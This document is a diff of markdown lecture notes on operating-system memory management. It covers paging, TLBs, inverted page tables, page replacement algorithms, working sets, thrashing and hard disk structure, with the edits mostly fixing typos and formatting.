We can see that the **only difference** between the logical address and physical address is the **four leftmost bits** (the **page number and frame number**). As **pages and frames are the same size**, the **offset value will be the same for both**.
|
||||
|
||||
This allows for **more optimisation** which is important as this translation will need to be **run for every memory read/write** call.
|
||||
@@ -4,29 +4,27 @@
|
||||
|
||||
Benefits of paging
|
||||
|
||||
* **Reduced internal fragmentation**
|
||||
* No **external fragmentation**
|
||||
* Code execution and data manipulation are usually **restricted to a small subset** (i.e limited number of pages) at any point in time.
|
||||
* **Not all pages** have to be **loaded in memory** at the **same time** => **virtual memory**
|
||||
* Loading an entire set of pages for an entire program/data set into memory is **wasteful**
|
||||
* Desired blocks could be **loaded on demand**.
|
||||
* This is called the **principle of locality**.
|
||||
- **Reduced internal fragmentation**
|
||||
- No **external fragmentation**
|
||||
- Code execution and data manipulation are usually **restricted to a small subset** (i.e. a limited number of pages) at any point in time.
|
||||
- **Not all pages** have to be **loaded in memory** at the **same time** => **virtual memory**
|
||||
- Loading an entire set of pages for an entire program/data set into memory is **wasteful**
|
||||
- Desired blocks could be **loaded on demand**.
|
||||
- This is called the **principle of locality**.
|
||||
|
||||
#### Memory as a linear array
|
||||
|
||||
> * Memory can be seen as one **linear array** of **bytes** (words)
|
||||
> * Address ranges from $0 - (N-1)$
|
||||
> * N address lines can be used to specify $2^N$ distinct addresses.
|
||||
> - Memory can be seen as one **linear array** of **bytes** (words)
|
||||
> - Address ranges from $0 - (N-1)$
|
||||
> - N address lines can be used to specify $2^N$ distinct addresses.
|
||||
|
||||
### Address Translation
|
||||
|
||||
* A **logical address** is relative to the start of the **program (memory)** and consists of two parts:
|
||||
* The **right most** $m$ **bits** that represent the **offset within the page** (and frame) .
|
||||
* $m$ often is 12 bits
|
||||
* The **left most** $n$ **bits** that represent the **page number** (and frame number they're the same thing)
|
||||
* $n$ is often 4 bits
|
||||
|
||||

|
||||
- A **logical address** is relative to the start of the **program (memory)** and consists of two parts:
|
||||
- The **rightmost** $m$ **bits** that represent the **offset within the page** (and frame).
|
||||
- $m$ often is 12 bits
|
||||
- The **leftmost** $n$ **bits** that represent the **page number** (and frame number - they're the same thing)
|
||||
- $n$ is often 4 bits
|
||||
|
||||
#### Steps in Address Translation
|
||||
|
||||
@@ -36,7 +34,7 @@ Benefits of paging
|
||||
>
|
||||
> **Hardware Implementation**
|
||||
>
|
||||
> 1. The CPU's **memory management uni** (MMU) intercepts logical addresses
|
||||
> 1. The CPU's **memory management unit** (MMU) intercepts logical addresses
|
||||
> 2. MMU uses a page table as above
|
||||
> 3. The resulting **physical address** is put on the **memory bus**.
|
||||
>
|
||||
@@ -46,7 +44,7 @@ Benefits of paging
|
||||
|
||||

|
||||
|
||||
We have more pages here, than we can physically store as frames.
|
||||
We have more pages here than we can physically store as frames.
|
||||
|
||||
**Resident set**: The set of pages that are loaded in main memory. (In the above image, the resident set consists of the pages not marked with an 'X')
|
||||
|
||||
@@ -54,10 +52,10 @@ We have more pages here, than we can physically store as frames.
|
||||
|
||||
> A **page fault** is generated if the processor accesses a page that is **not in memory**
|
||||
>
|
||||
> * A page fault results in an interrupt (process enters **blocked state**)
|
||||
> * An **I/O operation** is started to bring the missing page into main memory
|
||||
> * A **context switch** (may) take place.
|
||||
> * An **interrupt signal** shows that the I/O operation is complete and the process **enters the ready state**.
|
||||
> - A page fault results in an interrupt (process enters **blocked state**)
|
||||
> - An **I/O operation** is started to bring the missing page into main memory
|
||||
> - A **context switch** (may) take place.
|
||||
> - An **interrupt signal** shows that the I/O operation is complete and the process **enters the ready state**.
|
||||
|
||||
```
|
||||
1. Trap operating system
|
||||
@@ -78,59 +76,55 @@ We have more pages here, than we can physically store as frames.
|
||||
|
||||
#### Benefits
|
||||
|
||||
> * Being able to maintain **more processes** in main memory through the use of virtual memory **improves CPU utilisation**
|
||||
> * Individual processes take up less memory since they are only partially loaded
|
||||
> * Virtual memory allows the **logical address space** (processes) to be larger than **physical address space** (main memory)
|
||||
> * 64 bit machine => 2^64^ logical addresses (theoretically)
|
||||
> - Being able to maintain **more processes** in main memory through the use of virtual memory **improves CPU utilisation**
|
||||
> - Individual processes take up less memory since they are only partially loaded
|
||||
> - Virtual memory allows the **logical address space** (processes) to be larger than **physical address space** (main memory)
|
||||
> - 64-bit machine => $2^{64}$ logical addresses (theoretically)
|
||||
|
||||
#### Contents of a page entry
|
||||
|
||||
> * A **present/absent bit** that is set if the frame is in main memory or not.
|
||||
> * A **modified bit** that is set if the page/frame has been modified (only modified pages have to be written back to the disk when evicted. This makes sure the pages and frames are kept in sync).
|
||||
> * A **referenced bit** that is set if the page is in use (If you needed to free up space in main memory, move a page, however it is important that a page not in use is moved).
|
||||
> * **Protection and sharing bits**: read, write, execute or various different combos of those.
|
||||
|
||||

|
||||
> - A **present/absent bit** that is set if the frame is in main memory or not.
|
||||
> - A **modified bit** that is set if the page/frame has been modified (only modified pages have to be written back to the disk when evicted. This makes sure the pages and frames are kept in sync).
|
||||
> - A **referenced bit** that is set if the page is in use (If you needed to free up space in main memory, move a page, however it is important that a page not in use is moved).
|
||||
> - **Protection and sharing bits**: read, write, execute or various different combinations of those.
|
||||
|
||||
##### Page Table Size
|
||||
|
||||
> * On a **16 bit machine**, the total address space is 2^16^
|
||||
> * Assuming that 10 bits are used for the offset (2^10^)
|
||||
> * 6 bits can be used to number the pages
|
||||
> * This means 2^6^ or 64 pages can be maintained
|
||||
> * On a **32 bit machine**, 2^20^ or ~10^6^ pages can be maintained
|
||||
> * On a **64 bit machine**, this number increases a lot. This means the page table becomes stupidly large.
|
||||
> - On a **16-bit machine**, the total address space is $2^{16}$
|
||||
> - Assuming that 10 bits are used for the offset ($2^{10}$)
|
||||
> - 6 bits can be used to number the pages
|
||||
> - This means $2^{6}$ or 64 pages can be maintained
|
||||
> - On a **32-bit machine**, $2^{20}$ or ~$10^{6}$ pages can be maintained
|
||||
> - On a **64-bit machine**, this number increases a lot. This means the page table becomes extremely large.
|
||||
|
||||
Where do we **store page tables with increasing size**?
|
||||
|
||||
* Perfect world would be registers - however this isn't possible due to size
|
||||
* They will have to be stored in (virtual) **main memory**
|
||||
* **Multi-level** page tables
|
||||
* **Inverted page tables** (for large virtual address spaces)
|
||||
- Perfect world would be registers - however this isn't possible due to size
|
||||
- They will have to be stored in (virtual) **main memory**
|
||||
- **Multi-level** page tables
|
||||
- **Inverted page tables** (for large virtual address spaces)
|
||||
|
||||
However if the page table is to be stored in main memory, we must maintain acceptable speeds. The solution is to page the page table.
|
||||
However, if the page table is to be stored in main memory, we must maintain acceptable speeds. The solution is to page the page table.
|
||||
|
||||
### Multi-level Page Tables
|
||||
|
||||
We use a tree-like structure to hold the page tables
|
||||
|
||||
* Divide the page number into
|
||||
* An index to a page table of second level
|
||||
* A page within a second level page table
|
||||
- Divide the page number into
|
||||
- An index to a second-level page table
|
||||
- A page within a second-level page table
|
||||
|
||||
This means there's no need to keep all the page tables in memory all the time!
|
||||
|
||||

|
||||
The structure described above has two levels of page tables.
|
||||
|
||||
The above image has 2 levels of page tables.
|
||||
|
||||
> * The **root page table** is always maintained in memory.
|
||||
> * Page tables themselves are **maintained in virtual memory** due to their size.
|
||||
> - The **root page table** is always maintained in memory.
|
||||
> - Page tables themselves are **maintained in virtual memory** due to their size.
|
||||
>
|
||||
> Assume that a **fetch** from main memory takes *T* nano-seconds
|
||||
> Assume that a **fetch** from main memory takes *T* nanoseconds
|
||||
>
|
||||
> * With a **single page table level**, access is $2 \cdot T$
|
||||
> * With **two page table levels**, access is $3 \cdot T$
|
||||
> * and so on...
|
||||
> - With a **single page table level**, access is $2 \cdot T$
|
||||
> - With **two page table levels**, access is $3 \cdot T$
|
||||
> - and so on...
|
||||
>
|
||||
> We can have many levels as the address space in 64 bit computers is so massive.
|
||||
> We can have many levels as the address space in 64-bit computers is so massive.
|
||||
@@ -1,47 +1,47 @@
|
||||
12/11/20
|
||||
|
||||
## Page Tables Optimisations
|
||||
## Page Table Optimisations
|
||||
|
||||
##### Memory Organisation
|
||||
|
||||
* The **root page table** is always maintained in memory.
|
||||
* Page tables themselves are maintained in **virtual memory** due to their size.
|
||||
* Assume a **fetch** from main memory takes $T$ time - single page table access is now $2\cdot T$ and **two** page table levels access is $3 \cdot T$.
|
||||
* Some optimisation needs to be done, otherwise memory access will create a bottleneck to the speed of the computer.
|
||||
- The **root page table** is always maintained in memory.
|
||||
- Page tables themselves are maintained in **virtual memory** due to their size.
|
||||
- Assume a **fetch** from main memory takes $T$ time - single page table access is now $2\cdot T$ and **two** page table levels access is $3 \cdot T$.
|
||||
- Some optimisation needs to be done; otherwise, memory access will create a bottleneck in the speed of the computer.
|
||||
|
||||
### Translation Look Aside Buffers
|
||||
### Translation Lookaside Buffers
|
||||
|
||||
* Translation look aside buffers or TLBs are (usually) located inside the memory management unit
|
||||
* They **cache** the most frequently used page table entries.
|
||||
* As they're stored in cache its super quick.
|
||||
* They can be searched in **parallel**.
|
||||
* The principle behind TLBs is similar to other types of **caching in operating systems**. They normally store anywhere from 16 to 512 pages.
|
||||
* Remember: **locality** states that processes make a large number of references to a small number of pages.
|
||||
- Translation lookaside buffers, or TLBs, are (usually) located inside the memory management unit
|
||||
- They **cache** the most frequently used page table entries.
|
||||
- As they're stored in cache, access is very quick.
|
||||
- They can be searched in **parallel**.
|
||||
- The principle behind TLBs is similar to other types of **caching in operating systems**. They normally store anywhere from 16 to 512 pages.
|
||||
- Remember: **locality** states that processes make a large number of references to a small number of pages.
|
||||
|
||||

|
||||
|
||||
The split arrows going into the TLB represent searching in parallel.
|
||||
|
||||
* If the TLB gets a hit, it just returns the frame number
|
||||
* However if the TLB misses:
|
||||
* We have to account for the time it took to search the TLB
|
||||
* We then have to look in the page table to find the frame number
|
||||
* Worst case scenario is a page fault (takes the longest). This is where we have to retrieve a page table from secondary memory, so that it can then be searched.
|
||||
- If the TLB gets a hit, it just returns the frame number
|
||||
- However if the TLB misses:
|
||||
- We have to account for the time it took to search the TLB
|
||||
- We then have to look in the page table to find the frame number
|
||||
- Worst case scenario is a page fault (takes the longest). This is where we have to retrieve a page table from secondary memory, so that it can then be searched.
|
||||
|
||||
> Quick maths:
|
||||
>
|
||||
> * Assume a single-level page table
|
||||
> - Assume a single-level page table
|
||||
>
|
||||
> * Assume 20ns associative **TLB lookup time**
|
||||
> - Assume 20ns associative **TLB lookup time**
|
||||
>
|
||||
> * Assume a 100ns **memory access time**
|
||||
> - Assume a 100ns **memory access time**
|
||||
>
|
||||
> * **TLB hit** => 20 + 100 = 120ns
|
||||
> * **TLB miss** => 20 + 100 + 100 = 220ns
|
||||
> - **TLB hit** => 20 + 100 = 120ns
|
||||
> - **TLB miss** => 20 + 100 + 100 = 220ns
|
||||
>
|
||||
> * Performance evaluation of TLBs
|
||||
> - Performance evaluation of TLBs
|
||||
>
|
||||
> * For an 80% hit rate, the estimated access time is:
|
||||
> - For an 80% hit rate, the estimated access time is:
|
||||
>
|
||||
> $$
|
||||
> 120\cdot 0.8 + 220\cdot (1-0.8)=140ns
|
||||
@@ -49,7 +49,7 @@ The split arrows going into the TLB represent searching in parallel.
|
||||
>
|
||||
> (**40% slowdown** relative to absolute addressing)
|
||||
>
|
||||
> * For a 98% hit rate, the estimated access time is:
|
||||
> - For a 98% hit rate, the estimated access time is:
|
||||
>
|
||||
> $$
|
||||
> 120\cdot 0.98 + 220\cdot (1-0.98)=122ns
|
||||
@@ -63,65 +63,61 @@ The split arrows going into the TLB represent searching in parallel.
|
||||
|
||||
A **normal page table size** is proportional to the number of pages in the virtual address space => this can be prohibitive for modern machines
|
||||
|
||||
>An **inverted page table's size** is **proportional** to the size of **main memory**
|
||||
> An **inverted page table's size** is **proportional** to the size of **main memory**
|
||||
>
|
||||
>* The inverted table contains one **entry for every frame** (not for every page) and it **indexes entries by frame number** not by page number.
|
||||
>* When a process references a page, the OS must search the entire inverted page table for the corresponding entry (which could be too slow)
|
||||
> * It does save memory as there are fewer frames than pages.
|
||||
>* To find if your pages is in main memory, you need to iterate through the entire list.
|
||||
>* *Solution*: Use a **hash function** that transforms page numbers (*n* bits) into frame numbers (*m* bits) - Remember *n* > *m*
|
||||
> * The has functions turns a page number into a potential frame number.
|
||||
> - The inverted table contains one **entry for every frame** (not for every page) and it **indexes entries by frame number** not by page number.
|
||||
> - When a process references a page, the OS must search the entire inverted page table for the corresponding entry (which could be too slow)
|
||||
> - It does save memory as there are fewer frames than pages.
|
||||
> - To find out if your page is in main memory, you need to iterate through the entire list.
|
||||
> - *Solution*: Use a **hash function** that transforms page numbers (*n* bits) into frame numbers (*m* bits) - Remember *n* > *m*
|
||||
> - The hash function turns a page number into a potential frame number.
|
||||
|
||||
So when looking for the page's frame location. We have to sequentially search through the table until we hit a match, we then get the frame number from the index - in this case 4.
|
||||
When looking for the page's frame location, we have to sequentially search through the table until we find a match. We then get the frame number from the index - in this case 4.
|
||||
|
||||
#### Inverted Page Table Entry
|
||||
|
||||
> * The **frame number** will be the index of the inverted page table.
|
||||
> * Process Identifier (**PID**) - The process that owns this page.
|
||||
> * Virtual Page Number (**VPN**)
|
||||
> * **Protection** bits (Read/Write/Execute)
|
||||
> * **Chaining Pointer** - This field points towards the next frame that has exactly the same VPN. We need this to solve collisions
|
||||
|
||||

|
||||
|
||||

|
||||
> - The **frame number** will be the index of the inverted page table.
|
||||
> - Process Identifier (**PID**) - The process that owns this page.
|
||||
> - Virtual Page Number (**VPN**)
|
||||
> - **Protection** bits (Read/Write/Execute)
|
||||
> - **Chaining Pointer** - This field points towards the next frame that has exactly the same VPN. We need this to solve collisions
|
||||
|
||||
Due to the hash function, we now only have to look through all entries with **VPN**: 1 instead of all the entries.
|
||||
|
||||
#### Advantages
|
||||
|
||||
* The OS maintains a **single inverted page table** for all processes
|
||||
* It **saves lots of space** (especially when the virtual address space is much larger than the physical memory)
|
||||
- The OS maintains a **single inverted page table** for all processes
|
||||
- It **saves lots of space** (especially when the virtual address space is much larger than the physical memory)
|
||||
|
||||
#### Disadvantages
|
||||
|
||||
* Virtual to physical **translation becomes much slower**
|
||||
* Hash tables eliminates the need of searching the whole inverted table, but we have to handle collisions (which also **slows down translation**)
|
||||
* TLBs are necessary to improve their performance.
|
||||
- Virtual to physical **translation becomes much slower**
|
||||
- Hash tables eliminate the need to search the whole inverted table, but we have to handle collisions (which also **slows down translation**)
|
||||
- TLBs are necessary to improve their performance.
|
||||
|
||||
### Page Loading
|
||||
|
||||
* Two key decisions have to be made when using virtual memory
|
||||
* What pages are **loaded** and when
|
||||
* Predictions can be made for optimisation to reduce page faults
|
||||
* What pages are **removed** from memory and when
|
||||
* **page replacement algorithms**
|
||||
- Two key decisions have to be made when using virtual memory
|
||||
- What pages are **loaded** and when
|
||||
- Predictions can be made for optimisation to reduce page faults
|
||||
- What pages are **removed** from memory and when
|
||||
- **page replacement algorithms**
|
||||
|
||||
#### Demand Paging
|
||||
|
||||
> Demand paging starts the process with **no pages in memory**
|
||||
>
|
||||
> * The first instruction will immediately cause a **page fault**.
|
||||
> * **More page faults** will follow but they will **stabilise over time** until moving to the next **locality**
|
||||
> * The set of pages that is currently being used is called it's **working set** (same as the resident set)
|
||||
> * Pages are only **loaded when needed** (i.e after **page faults**)
|
||||
> - The first instruction will immediately cause a **page fault**.
|
||||
> - **More page faults** will follow but they will **stabilise over time** until moving to the next **locality**
|
||||
> - The set of pages that is currently being used is called its **working set** (same as the resident set)
|
||||
> - Pages are only **loaded when needed** (i.e. after **page faults**)
|
||||
|
||||
#### Pre-Paging
|
||||
|
||||
> When the process is started, all pages expected to be used (the working set) are **brought into memory at once**
|
||||
>
|
||||
> * This **reduces the page fault rate**
|
||||
> * Retrieving multiple (**contiguously stored**) pages **reduces transfer times** (seek time, rotational latency, etc)
|
||||
> - This **reduces the page fault rate**
|
||||
> - Retrieving multiple (**contiguously stored**) pages **reduces transfer times** (seek time, rotational latency, etc)
|
||||
>
|
||||
> **Pre-paging** loads as many pages as possible **before page faults are generated** (a similar method is used when processes are **swapped in and out**)
|
||||
|
||||
@@ -131,35 +127,35 @@ Due to the hash function, we now only have to look through all entries with **VP
|
||||
|
||||
NOTE: This doesn't take into account TLBs.
|
||||
|
||||
The expected access time is **proportional to page fault rate** when keeping page faults into account.
|
||||
The expected access time is **proportional to page fault rate** when taking page faults into account.
|
||||
|
||||
$$
|
||||
T_{a} \space\space\alpha \space\space p
|
||||
$$
|
||||
|
||||
* Ideally, all pages would have to be loaded without demanding paging.
|
||||
- Ideally, all pages would have to be loaded without demand paging.
|
||||
|
||||
### Page Replacement
|
||||
|
||||
> * The OS must choose a **page to remove** when a new one is loaded
|
||||
> * This choice is made by **page replacement algorithms** and **takes into account**:
|
||||
> * When the page was **last used** or **expected to be used again**
|
||||
> * Whether the page has been **modified** (this would cause a write).
|
||||
> * Replacement choices have to be made **intelligently** to **save time**.
|
||||
> - The OS must choose a **page to remove** when a new one is loaded
|
||||
> - This choice is made by **page replacement algorithms** and **takes into account**:
|
||||
> - When the page was **last used** or **expected to be used again**
|
||||
> - Whether the page has been **modified** (this would cause a write).
|
||||
> - Replacement choices have to be made **intelligently** to **save time**.
|
||||
|
||||
#### Optimal Page Replacement
|
||||
|
||||
> * In an **ideal** world
|
||||
> * Each page is labelled with the **number of instructions** that will be executed/length of time before it is used again.
|
||||
> * The page which is **going to be not referenced** for the **longest time** is the optimal one to remove.
|
||||
> * The **optimal approach** is **not possible to implement**
|
||||
> * It can be used for post execution analysis
|
||||
> * It provides a **lower bound** on the number of page faults (used for comparison with other algorithms)
|
||||
> - In an **ideal** world
|
||||
> - Each page is labelled with the **number of instructions** that will be executed/length of time before it is used again.
|
||||
> - The page which is **going to be not referenced** for the **longest time** is the optimal one to remove.
|
||||
> - The **optimal approach** is **not possible to implement**
|
||||
> - It can be used for post execution analysis
|
||||
> - It provides a **lower bound** on the number of page faults (used for comparison with other algorithms)
|
||||
|
||||
#### FIFO
|
||||
|
||||
> * FIFO maintains a **linked list** of new pages, and **new pages** are added at the end of the list
|
||||
> * The **oldest page at the head** of the list is **evicted when a page fault occurs**
|
||||
> - FIFO maintains a **linked list** of new pages, and **new pages** are added at the end of the list
|
||||
> - The **oldest page at the head** of the list is **evicted when a page fault occurs**
|
||||
>
|
||||
> This is a pretty bad algorithm <s>unsurprisingly</s>
|
||||
|
||||
|
||||
@@ -6,20 +6,20 @@
|
||||
|
||||
##### Second chance
|
||||
|
||||
> * If a page at the front of the list has **not been referenced** it is **evicted**
|
||||
> * If the reference bit is set, the page is **placed at the end** of the list and it's reference bit is unset.
|
||||
> * This works better than FIFO and is relatively simple
|
||||
> * **Costly to implement** as the list is constantly changing.
|
||||
> * Can degrade to FIFO if all pages were initially referenced.
|
||||
> - If a page at the front of the list has **not been referenced** it is **evicted**
|
||||
> - If the reference bit is set, the page is **placed at the end** of the list and its reference bit is unset.
|
||||
> - This works better than FIFO and is relatively simple
|
||||
> - **Costly to implement** as the list is constantly changing.
|
||||
> - Can degrade to FIFO if all pages were initially referenced.
|
||||
|
||||
##### Clock Replacement Algorithm
|
||||
|
||||
> The second chance implementation can be improved by **maintaining the page list as a circle**
|
||||
>
|
||||
> * A **pointer** points to the last visited page.
|
||||
> * In this form the algorithm is called the one handed clock
|
||||
> * It is faster, but can still be **slow if the list is long**.
|
||||
> * The **time spent** on **maintaining** the list is **reduced**.
|
||||
> - A **pointer** points to the last visited page.
|
||||
> - In this form, the algorithm is called the one-handed clock
|
||||
> - It is faster, but can still be **slow if the list is long**.
|
||||
> - The **time spent** on **maintaining** the list is **reduced**.
|
||||
|
||||

|
||||
|
||||
@@ -27,7 +27,7 @@
|
||||
|
||||
> For NRU, **referenced** and **modified** bits are kept in the page table
|
||||
>
|
||||
> * Referenced bits are set to 0 at the start, and **reset periodically**
|
||||
> - Referenced bits are set to 0 at the start, and **reset periodically**
|
||||
>
|
||||
> There are four different **page types** in NRU:
|
||||
>
|
||||
@@ -46,35 +46,34 @@
|
||||
|
||||
##### Least Used Recently
|
||||
|
||||
> Least recently used **evicts the page** that has **not be used for the longest**
|
||||
> Least recently used **evicts the page** that has **not been used for the longest**
|
||||
>
|
||||
> * The OS must keep track of when a page was last used.
|
||||
> * Every page table entry contains a field for the counter
|
||||
> * This is **not cheap to implement** as we need to maintain a **list of pages** which are **sorted** in the order in which they have been used.
|
||||
> - The OS must keep track of when a page was last used.
|
||||
> - Every page table entry contains a field for the counter
|
||||
> - This is **not cheap to implement** as we need to maintain a **list of pages** which are **sorted** in the order in which they have been used.
|
||||
>
|
||||
> This algorithm can be **implemented in hardware** using a **counter** that is incremented after each instruction ...
|
||||
|
||||

|
||||
|
||||
This will look familiar to the FIFO algorithm however, when a page is used, that is like its just come in.
|
||||
|
||||
This will look familiar to the FIFO algorithm. However, when a page is used, it is treated as if it has just come in.
|
||||
|
||||
### Resident Set
|
||||
|
||||
How many pages should be allocated to individual processes:
|
||||
|
||||
* **Small resident sets** enable to store **more processes in memory** => improved CPU utilisation.
|
||||
* **Small resident sets** may result in **more page faults**
|
||||
* **Large resident sets** may **no longer reduce** the **page fault rate** (**diminishing returns**)
|
||||
- **Small resident sets** enable us to store **more processes in memory** => improved CPU utilisation.
|
||||
- **Small resident sets** may result in **more page faults**
|
||||
- **Large resident sets** may **no longer reduce** the **page fault rate** (**diminishing returns**)
|
||||
|
||||
A trade-off exists between the **sizes of the resident sets** and **system utilisation**.
|
||||
|
||||
Resident set sizes may be **fixed** or **variable** (adjusted at run-time)
|
||||
|
||||
* For **variable sized** resident sets, **replacement policies** can be:
|
||||
* **Local**: a page of the same process is replaced
|
||||
* **Global**: a page can be taken away from a **different process**
|
||||
* Variable sized sets require **careful evaluation of their size** when a **local scope** is used (often based on the **working set** or the **page fault rate**)
|
||||
- For **variable-sized** resident sets, **replacement policies** can be:
|
||||
- **Local**: a page of the same process is replaced
|
||||
- **Global**: a page can be taken away from a **different process**
|
||||
- Variable sized sets require **careful evaluation of their size** when a **local scope** is used (often based on the **working set** or the **page fault rate**)
|
||||
|
||||
### Working Set
|
||||
|
||||
@@ -82,18 +81,18 @@ The **resident set** comprises the set of pages of the process that are in memor
|
||||
|
||||
The **working set** is a subset of the resident set that is actually needed for execution.
|
||||
|
||||
* The **working set** $W(t, k)$ comprises the set of referenced pages in the last $k$ (working set window) **virtual time units for the process**.
|
||||
* $k$ can be defined as **memory references** or as **actual process time**
|
||||
* The set of most recent used pages
|
||||
* The set of pages used within a pre-specified time interval
|
||||
* The **working set size** can be used as a guide for the number of frames that should be allocated to a process.
|
||||
- The **working set** $W(t, k)$ comprises the set of referenced pages in the last $k$ (working set window) **virtual time units for the process**.
|
||||
- $k$ can be defined as **memory references** or as **actual process time**
|
||||
- The set of most recently used pages
|
||||
- The set of pages used within a pre-specified time interval
|
||||
- The **working set size** can be used as a guide for the number of frames that should be allocated to a process.
|
||||
|
||||

|
||||
|
||||
The working set is a **function of time** $t$:
|
||||
|
||||
* Processes **move between localities**, hence, the pages that are included in the working set **change over time**
|
||||
* **Stable** intervals alternate with intervals of **rapid change**
|
||||
- Processes **move between localities**, hence, the pages that are included in the working set **change over time**
|
||||
- **Stable** intervals alternate with intervals of **rapid change**
|
||||
|
||||
$|W(t,k)|$ is then a variable in time. Specifically:
|
||||
|
||||
@@ -105,74 +104,72 @@ where $N$ is the total number of pages of the process. All the maths is saying i
|
||||
|
||||
Choosing the right value for $k$ is important:
|
||||
|
||||
* Too **small**: inaccurate, pages are missing
|
||||
* Too **large**: too many unused pages present
|
||||
* **Infinity**: all pages of the process are in the working set
|
||||
- Too **small**: inaccurate, pages are missing
|
||||
- Too **large**: too many unused pages present
|
||||
- **Infinity**: all pages of the process are in the working set
|
||||
|
||||
Working sets can be used to guide the **size of the resident sets**
|
||||
|
||||
* Monitor the working set
|
||||
* Remove pages from the resident set that are not in the working set
|
||||
- Monitor the working set
|
||||
- Remove pages from the resident set that are not in the working set
|
||||
|
||||
The working set is costly to maintain => **page fault frequency (PFF)** can be used as an approximation: $PFF\space\alpha\space k$
|
||||
|
||||
* If the PFF is increased -> we need to increase $k$
|
||||
* If PFF is very low -> we could decrease $k$ to allow more processes to have more pages.
|
||||
- If the PFF is increased -> we need to increase $k$
|
||||
- If PFF is very low -> we could decrease $k$ to allow more processes to have more pages.
|
||||
|
||||
#### Global Replacement
|
||||
|
||||
> Global replacement policies can select frames from the entire set (they can be taken from other processes)
|
||||
>
|
||||
> * Frames are **allocated dynamically** to processes
|
||||
> * Processes cannot control their own page fault frequency. The PFF of one process is **influenced by other processes**.
|
||||
> - Frames are **allocated dynamically** to processes
|
||||
> - Processes cannot control their own page fault frequency. The PFF of one process is **influenced by other processes**.
|
||||
|
||||
#### Local Replacement
|
||||
|
||||
> Local replacement policies can only select frames that are allocated to the current process
|
||||
>
|
||||
> * Every process has a **fixed fraction of memory**
|
||||
> * The **locally oldest page** is not necessarily the **globally oldest page**
|
||||
> - Every process has a **fixed fraction of memory**
|
||||
> - The **locally oldest page** is not necessarily the **globally oldest page**
|
||||
|
||||
Windows uses a variable approach with local replacement. Page replacement algorithms can use both policies.
|
||||
|
||||
|
||||
### Paging Daemon
|
||||
|
||||
It is more efficient to **proactively** keep a number of **free pages** for **future page faults**
|
||||
|
||||
* If not, we may have to **find a page** to evict and we **write it to the drive** (if its been modified) first when a page fault occurs.
|
||||
- If not, we may have to **find a page** to evict and **write it to the drive** (if it's been modified) first when a page fault occurs.
|
||||
|
||||
Many systems have a background process called a **paging daemon**.
|
||||
|
||||
* This process **runs at periodic intervals**
|
||||
* It inspects the state of the frames and if too few frames are free, it **selects pages to evict** (using page replacement algorithms)
|
||||
- This process **runs at periodic intervals**
|
||||
- It inspects the state of the frames and if too few frames are free, it **selects pages to evict** (using page replacement algorithms)
|
||||
|
||||
Paging daemons can be combined with **buffering** (free and modified lists) => write the modified pages **but keep them in main memory** when possible.
|
||||
|
||||
**Buffering**: a process that preemptively writes modified pages to the disk. That way when there's a page fault we don't lose the time taken to write to disk
|
||||
|
||||
|
||||
### Thrashing
|
||||
|
||||
Assume **all available pages are in active use** and a new page needs to be loaded:
|
||||
|
||||
* The page that will be evicted will have to be **reloaded soon afterwards**
|
||||
- The page that will be evicted will have to be **reloaded soon afterwards**
|
||||
|
||||
**Thrashing** occurs when pages are **swapped out** and then **loaded back in immediately**
|
||||
|
||||
#### Causes of thrashing include:
|
||||
|
||||
* The degree of multi-programming is too high i.e the total **demand** (the sum of all working sets sizes) **exceeds supply** (the available frames)
|
||||
* An individual process is allocated **too few pages**
|
||||
- The degree of multi-programming is too high, i.e. the total **demand** (the sum of all working set sizes) **exceeds supply** (the available frames)
|
||||
- An individual process is allocated **too few pages**
|
||||
|
||||
This can be prevented by **using good page replacement algorithms**, reducing the **degree of multi-programming** or adding more memory.
|
||||
|
||||
The **page fault frequency** can be used to detect that a system is thrashing.
|
||||
|
||||
> * CPU utilisation is too low => scheduler **increases degree of multi-programming**
|
||||
> * Frames are allocated to new processes and taken away from existing processes
|
||||
> * I/O requests are queued up as a consequence of page faults
|
||||
> - CPU utilisation is too low => scheduler **increases degree of multi-programming**
|
||||
> - Frames are allocated to new processes and taken away from existing processes
|
||||
> - I/O requests are queued up as a consequence of page faults
|
||||
>
|
||||
> This is a positive reinforcement cycle.
|
||||
|
||||
And when all this comes together, its how memory management working in modern computers.
|
||||
When all this comes together, this is how memory management works in modern computers.
|
||||
@@ -8,9 +8,9 @@
|
||||
|
||||
> Disks are constructed as multiple aluminium/glass platters covered with **magnetisable material**
|
||||
>
|
||||
> * Read/Write heads fly just above the surface and are connected to a single disk arm controlled by a single actuator
|
||||
> * **Data** is stored on **both sides**
|
||||
> * Hard disks **rotate** at a **constant speed**
|
||||
> - Read/Write heads fly just above the surface and are connected to a single disk arm controlled by a single actuator
|
||||
> - **Data** is stored on **both sides**
|
||||
> - Hard disks **rotate** at a **constant speed**
|
||||
>
|
||||
> A hard disk controller sits between the CPU and the drive
|
||||
>
|
||||
@@ -22,15 +22,15 @@
|
||||
|
||||
> Disks are organised in:
|
||||
>
|
||||
> * **Cylinders**: a collection of tracks in the same relative position to the spindle
|
||||
> * **Tracks**: a concentric circle on a single platter side
|
||||
> * **Sectors**: segments of a track - usually have an **equal number of bytes** in them, consisting of a **preamble, data** and an **error correcting code** (ECC).
|
||||
> - **Cylinders**: a collection of tracks in the same relative position to the spindle
|
||||
> - **Tracks**: a concentric circle on a single platter side
|
||||
> - **Sectors**: segments of a track - usually have an **equal number of bytes** in them, consisting of a **preamble, data** and an **error correcting code** (ECC).
|
||||
>
|
||||
> The number of sectors on each track increases from the inner most track to the outer tracks.
|
||||
> The number of sectors on each track increases from the innermost track to the outer tracks.
|
||||
|
||||
##### Organisation of hard drives
|
||||
|
||||
Disks usually have a **cylinder skew** i.e an **offset** is added to sector 0 in adjacent tracks to account for the seek time.
|
||||
Disks usually have a **cylinder skew**, i.e. an **offset** is added to sector 0 in adjacent tracks to account for the seek time.
|
||||
|
||||
In the past, consecutive **disk sectors were interleaved** to account for transfer time (of the read/write head)
|
||||
|
||||
@@ -40,11 +40,11 @@ NOTE: disk capacity is reduced due to preamble & ECC
|
||||
|
||||
**Access time** = seek time + rotational delay + transfer time
|
||||
|
||||
* **Seek time**: time needed to move the arm to the cylinder
|
||||
- **Seek time**: time needed to move the arm to the cylinder
|
||||
|
||||
* **Rotational latency**: time before the sector appears underneath the read/write head (on average its half a rotation)
|
||||
- **Rotational latency**: time before the sector appears underneath the read/write head (on average, it's half a rotation)
|
||||
|
||||
* **Transfer time**: time to transfer the data
|
||||
- **Transfer time**: time to transfer the data
|
||||
|
||||

|
||||
|
||||
@@ -54,7 +54,7 @@ In this scenario, dominance of seek time leaves room for **optimisation** by car
|
||||
|
||||

|
||||
|
||||
